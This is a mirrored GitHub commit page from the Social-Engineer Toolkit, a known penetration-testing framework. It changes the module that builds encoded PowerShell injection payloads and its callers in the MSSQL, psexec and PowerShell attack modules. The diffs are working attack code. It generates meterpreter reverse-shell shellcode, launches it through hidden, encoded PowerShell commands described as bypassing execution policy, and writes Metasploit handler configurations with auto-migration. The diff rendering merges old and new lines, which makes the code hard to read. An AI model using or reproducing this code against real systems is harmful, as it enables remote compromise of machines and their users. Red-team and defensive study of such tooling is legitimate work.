Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-11-26 22:40:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

multiple fixes for powershell injection

Browse source
This commit is contained in:
TrustedSec 2016-08-01 20:12:15 -04:00
parent c6daf7e063
commit a4e6408170
9 changed files with 206 additions and 187 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

7
readme/CHANGELOG
View file

@ -1,3 +1,10 @@
~~~~~~~~~~~~~~~~
version 7.3.7
~~~~~~~~~~~~~~~~
* replaced powershell prep with the old one - it broke almost all powershell injection in SET
* fixed an issue that would cause scanner to continue to scan even when port not discovered (function issue)
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
version 7.3.6 version 7.3.6
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~

4
src/core/fasttrack.py
View file

@ -113,8 +113,8 @@ try:
for ip in range1: for ip in range1:
sqlport = get_sql_port(ip) sqlport = get_sql_port(ip)
if sqlport == None: if sqlport == None:
sql_nmap_scan(ip) nmapscan = sql_nmap_scan(ip)
if sql_nmap_scan != "": if nmapscan != "":
sql_servers = sql_servers + \ sql_servers = sql_servers + \
ip + ":" + "1433" + "," ip + ":" + "1433" + ","

6
src/core/payloadgen/create_payloads.py
View file

@ -10,7 +10,6 @@ import base64
from src.core.setcore import * from src.core.setcore import *
from src.core.menu.text import * from src.core.menu.text import *
from src.core.dictionaries import * from src.core.dictionaries import *
from src.payloads.powershell.prep import prep_powershell_payload
try: try:
if len(check_options("IPADDR=")) > 2: if len(check_options("IPADDR=")) > 2:
@ -600,7 +599,10 @@ try:
if setshell_counter == 0: if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (setdir)): if os.path.isfile("%s/web_clone/index.html" % (setdir)):
prep_powershell_payload() try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
if os.path.isfile("%s/x86.powershell" % (setdir)): if os.path.isfile("%s/x86.powershell" % (setdir)):
fileopen1 = open( fileopen1 = open(
"%s/x86.powershell" % (setdir), "r") "%s/x86.powershell" % (setdir), "r")

2
src/core/set.version
View file

@ -1 +1 @@
7.3.6 7.3.7

2
src/core/setcore.py
View file

@ -1762,7 +1762,7 @@ def get_sql_port(host):
# Build the socket with a .1 second timeout # Build the socket with a .1 second timeout
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(.1) s.settimeout(.3)
# Attempt to query UDP:1434 and return MSSQL running port # Attempt to query UDP:1434 and return MSSQL running port
try: try:

16
src/fasttrack/mssql.py
View file

@ -8,7 +8,6 @@ import subprocess
import time import time
import src.core.setcore as core import src.core.setcore as core
import impacket.tds as tds import impacket.tds as tds
from src.payloads.powershell.prep import prep_powershell_payload
#from src.core.payloadgen import create_payloads #from src.core.payloadgen import create_payloads
@ -173,7 +172,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
if choice1 == "1": if choice1 == "1":
web_path = None web_path = None
prep_powershell_payload()
#prep_powershell_payload()
# if we are using a SET interactive shell payload then we need to make # if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set # the path under web_clone versus ~./set
@ -245,20 +245,20 @@ def deploy_hex2binary(ipaddr, port, username, password):
filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
filewrite.close() filewrite.close()
#try: try:
# core.module_reload(src.payloads.powershell.prep) core.module_reload(src.payloads.powershell.prep)
#except: except:
# import src.payloads.powershell.prep import src.payloads.powershell.prep
# launch powershell # launch powershell
prep_powershell_payload() #prep_powershell_payload()
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell")) os.makedirs(os.path.join(core.setdir + "reports/powershell"))
#with open(os.path.join(core.setdir + "x86.powershell")) as x86: #with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = file(core.setdir + "x86.powershell").read() x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read() # x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)

8
src/fasttrack/psexec.py
View file

@ -8,7 +8,6 @@ import os
import subprocess import subprocess
import src.core.setcore as core import src.core.setcore as core
from src.payloads.powershell.prep import prep_powershell_payload
# Py2/3 compatibility # Py2/3 compatibility
# Python3 renamed raw_input to input # Python3 renamed raw_input to input
@ -75,7 +74,12 @@ try:
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
prep_powershell_payload() #prep_powershell_payload()
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):

340
src/payloads/powershell/prep.py
View file

@ -1,201 +1,203 @@
#!/usr/bin/env python #!/usr/bin/env python
# coding=utf-8 import sys
import os import subprocess
import re import re
import os
import time import time
from src.core.setcore import *
import src.core.setcore as core # grab stage encoding flag
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# Py2/3 compatibility # check to see if we are just generating powershell code
# Python3 renamed raw_input to input powershell_solo = check_options("POWERSHELL_SOLO")
try:
input = raw_input
except NameError:
pass
def prep_powershell_payload(): # check if port is there
port = check_options("PORT=")
# grab stage encoding flag # check if we are using auto_migrate
stage_encoding = core.check_config("STAGE_ENCODING=").lower() auto_migrate = check_config("AUTO_MIGRATE=")
if stage_encoding == "off":
stage_encoding = "false" # check if we are using pyinjection
pyinjection = check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(setdir + "/payload_options.shellcode"):
pyinjection = "on"
print_status(
"Multi/Pyinjection was specified. Overriding config options.")
else: else:
stage_encoding = "true" pyinjection = "off"
# check to see if we are just generating powershell code # grab ipaddress
powershell_solo = core.check_options("POWERSHELL_SOLO") if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
# check if port is there # check to see if we are using multi powershell injection
port = core.check_options("PORT=") multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
# check if we are using auto_migrate # turn off multi injection if pyinjection is specified
auto_migrate = core.check_config("AUTO_MIGRATE=") if pyinjection == "on":
multi_injection = "off"
# check if we are using pyinjection # check what payloads we are using
pyinjection = core.check_options("PYINJECTION=") powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
pyinjection = "on"
core.print_status("Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress # if we specified a hostname then default to reverse https/http
if core.check_options("IPADDR=") != 0: if validate_ip(ipaddr) == False:
ipaddr = core.check_options("IPADDR=") powershell_inject_x86 = "windows/meterpreter/reverse_http"
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
core.update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection # prompt what port to listen on for powershell then make an append to the current
multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower() # metasploit answer file
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# turn off multi injection if pyinjection is specified # if we have multi injection on, don't worry about these
if pyinjection == "on": if multi_injection != "on":
multi_injection = "off" if pyinjection == "off":
print_status(
# check what payloads we are using "POWERSHELL_INJECTION is set to ON with multi-pyinjector")
powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=") port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
# if we specified a hostname then default to reverse https/http if port == "":
if not core.validate_ip(ipaddr):
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443" port = "443"
with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen: fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r")
data = fileopen.read() data = fileopen.read()
match = re.search(port, data) match = re.search(port, data)
if not match: if not match:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: filewrite = open(
filewrite.write("\nuse exploit/multi/handler\n") "%s/meta_config_multipyinjector" % (setdir), "a")
if auto_migrate == "ON": filewrite.write("\nuse exploit/multi/handler\n")
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") if auto_migrate == "ON":
filewrite.write("set PAYLOAD {0}\n" filewrite.write(
"set LHOST {1}\n" "set AutoRunScript post/windows/manage/smart_migrate\n")
"set LPORT {2}\n" filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" %
"set EnableStageEncoding {3}\n" (powershell_inject_x86, ipaddr, port, stage_encoding))
"set ExitOnSession false\n" filewrite.close()
"exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))
# if we have multi injection on, don't worry about these # if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off": if multi_injection != "on":
if pyinjection == "off":
# check to see if the meta config multi pyinjector is there # check to see if the meta config multi pyinjector is there
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
if core.check_options("PORT=") != 0: if check_options("PORT=") != 0:
port = core.check_options("PORT=") port = check_options("PORT=")
# if port.options isnt there then prompt # if port.options isnt there then prompt
else: else:
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) port = input(setprompt(
if not port: ["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443" port = "443"
core.update_options("PORT={0}".format(port)) update_options("PORT=" + port)
# turn off multi_injection if we are riding solo from the powershell menu # turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON": if powershell_solo == "ON":
multi_injection = "off" multi_injection = "off"
pyinjection = "on" pyinjection = "on"
# if we are using multi powershell injection # if we are using multi powershell injection
if multi_injection == "on" and pyinjection == "off": if multi_injection == "on":
core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...") if pyinjection == "off":
print_status(
"Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable # define a base variable
x86 = "" x86 = ""
# specify a list we will use for later # specify a list we will use for later
multi_injection_x86 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports != "":
print_status(
"Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
port_check = check_ports(
"%s/meta_config_multipyinjector" % (setdir), ports)
if port_check == False:
filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/meta_config" % (setdir)):
filewrite = open("%s/meta_config" % (setdir), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/meta_config" % (setdir), ports)
if port_check == False:
filewrite = open("%s/meta_config" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
multi_injection_x86 = "" multi_injection_x86 = ""
# read in the file we need for parsing
# here we do some funky loops so we don't need to rewrite the code below fileopen = open(setdir + "/payload_options.shellcode", "r")
if multi_injection == "on": payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
port = core.check_config("POWERSHELL_MULTI_PORTS=") payloads = payloads.split(",")
port = port.split(",") # format: payload<space>port
for payload in payloads:
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports:
core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set LPORT {3}\n"
"set ExitOnSession false\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# if we aren't using multi pyinjector
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if meta config isn't created yet then create it
if not os.path.isfile():
with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
filewrite.write("")
port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set ExitOnSession false\n"
"set LPORT {3}\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
injections = []
# read in the file we need for parsing
with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# format: payload<space>port # format: payload<space>port
for payload in payloads: payload = payload.split(" ")
# format: payload<space>port powershell_inject_x86 = payload[0]
payload = payload.split(" ") port = payload[1]
powershell_inject_x86 = payload[0] print_status("Generating x86-based powershell injection code...")
port = payload[1] multi_injection_x86 = multi_injection_x86 + "," + \
core.print_status("Generating x86-based powershell injection code...") generate_powershell_alphanumeric_payload(
injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)) powershell_inject_x86, ipaddr, port, x86)
multi_injection_x86 = ",".join(injections)
# if its turned to off # if its turned to off
if multi_injection == "off" and pyinjection == "off": if multi_injection == "off":
core.print_status("Generating x86-based powershell injection code...") if pyinjection == "off":
x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection # if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on": if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user # check to see if we want to display the powershell command to the user
verbose = core.check_config("POWERSHELL_VERBOSE=") verbose = check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on": if verbose.lower() == "on":
core.print_status("Printing the x86 based encoded code...") print_status("Printing the x86 based encoded code...")
time.sleep(3) time.sleep(3)
print(x86) print(x86)
#with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite: filewrite = open("%s/x86.powershell" % (setdir), "w")
filewrite = open(core.setdir + "/x86.powershell", "w") filewrite.write(x86)
filewrite.write(x86) filewrite.close()
filewrite.close() print_status("Finished generating powershell injection bypass.")
core.print_status("Finished generating powershell injection bypass.") print_status("Encoded to bypass execution restriction policy...")
core.print_status("Encoded to bypass execution restriction policy...")

8
src/powershell/powershell.py
View file

@ -12,7 +12,6 @@ import subprocess
import src.core.setcore as core import src.core.setcore as core
from src.core.menu import text from src.core.menu import text
from src.payloads.powershell.prep import prep_powershell_payload
# Py2/3 compatibility # Py2/3 compatibility
# Python3 renamed raw_input to input # Python3 renamed raw_input to input
@ -43,7 +42,12 @@ if powershell_menu_choice != "99":
with open(core.setdir + "/payload_options.shellcode", "w") as filewrite: with open(core.setdir + "/payload_options.shellcode", "w") as filewrite:
filewrite.write("windows/meterpreter/reverse_tcp {},".format(port)) filewrite.write("windows/meterpreter/reverse_tcp {},".format(port))
prep_powershell_payload() try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
#prep_powershell_payload()
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.setdir + "/reports/powershell"):